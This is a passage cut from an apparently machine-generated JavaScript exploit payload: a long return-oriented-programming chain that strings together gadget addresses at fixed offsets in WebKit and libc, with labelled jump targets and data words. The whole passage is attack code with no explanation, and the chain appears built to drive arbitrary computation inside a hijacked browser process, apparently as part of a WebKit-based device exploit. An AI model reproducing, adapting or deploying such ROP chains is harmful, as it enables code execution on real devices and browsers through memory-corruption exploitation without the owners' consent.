webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+376104, //L7767+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+376096, //L7767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7767:
db([0, 0]); // 0x0
set_gadgets([
ropchain+376120, //L7767+24
ropchain+376136, //L7762
libc_base+782311, //pop rsp
ropchain+390920, //L7768
//L7762:
libc_base+782311, //pop rsp
ropchain+393088, //L7769
//L7648:
libc_base+764760, //pop rsi
ropchain+376192, //L7770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7772:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+376312, //L7775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+376296, //L7773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7773:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7775:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+376488, //L7778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+376504, //L7779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+376456, //L7776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+376472, //L7777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7776:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7777:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7778:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7779:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+376600, //L7781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+376584, //L7780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7780:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7781:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7782:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7783:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L7784:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+376800, //L7786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7786:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+376856, //L7787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7787:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+376992, //L7791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+376976, //L7790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7789:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7790:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7791:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+377056, //L7792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7792:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7794:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7796:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+377216, //L7799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+377200, //L7797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7797:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7799:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+377360, //L7802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+377328, //L7800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+377344, //L7801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7800:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7801:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7802:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+377448, //L7804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7803:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7804:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+377504, //L7805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7805:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7807:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+377584, //L7809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7809:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+377664, //L7810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7810:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7812:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+377784, //L7815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+377768, //L7813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7815:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+377864, //L7816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+377880, //L7817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7816:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+378040, //L7821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+378008, //L7819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+378024, //L7820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7818:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7820:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+378096, //L7823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7823:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+378224, //L7825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+378240, //L7826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+378208, //L7824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7824:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7825:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7826:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+378400, //L7830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+378368, //L7828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+378384, //L7829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7827:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7828:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7829:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+378456, //L7832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7832:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+378584, //L7834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+378600, //L7835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+378568, //L7833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7833:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7834:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7835:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+378760, //L7839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+378728, //L7837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+378744, //L7838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7836:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7837:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7838:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7839:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+378816, //L7841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7841:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+378944, //L7843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+378960, //L7844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+378928, //L7842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7842:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7843:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7844:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+379040, //L7845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+379056, //L7846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7845:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7846:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+379152, //L7848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+379136, //L7847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7847:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7848:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+379232, //L7849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7849:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7850:
db([108, 0]); // 0x6c
set_gadget(libc_base+144605,); //pop rdi
//L7851:
db([108, 0]); // 0x6c
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+379376, //L7852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+379408, //L7854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+379392, //L7853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7852:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7853:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7854:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+379576, //L7856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+379592, //L7857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+379560, //L7855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7855:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7856:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7857:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+379704, //L7859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+379752, //L7862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+379720, //L7860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7859:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7861:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7862:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+379864, //L7863+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+379856, //L7863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7863:
db([0, 0]); // 0x0
set_gadgets([
ropchain+379880, //L7863+24
ropchain+381352, //L7858
libc_base+764760, //pop rsi
ropchain+379920, //L7864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7864:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7866:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+380040, //L7869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+380024, //L7867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7867:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+380216, //L7872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+380232, //L7873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+380184, //L7870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+380200, //L7871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7870:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7871:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7872:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7873:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+380328, //L7875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+380312, //L7874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7874:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7875:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7876:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7877:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L7878:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+380528, //L7880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+380584, //L7881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7881:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+380720, //L7885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+380704, //L7884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7883:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7884:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7885:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+380784, //L7886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7886:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7888:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7890:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+380944, //L7893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+380928, //L7891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+381088, //L7896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+381056, //L7894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+381072, //L7895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7894:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7895:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7896:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+381176, //L7898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7897:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7898:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+381232, //L7899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7899:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7901:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+381312, //L7903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7903:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L7858:
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7678:
libc_base+764760, //pop rsi
ropchain+381408, //L7905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7905:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7907:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+381528, //L7910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+381512, //L7908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7908:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7910:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+381704, //L7913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+381720, //L7914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+381672, //L7911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+381688, //L7912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7911:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7912:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7913:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7914:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+381816, //L7916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+381800, //L7915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7915:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7916:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7917:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7918:
db([7, 0]); // 0x7
set_gadget(libc_base+763368,); //pop rcx
//L7919:
db([7, 0]); // 0x7
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
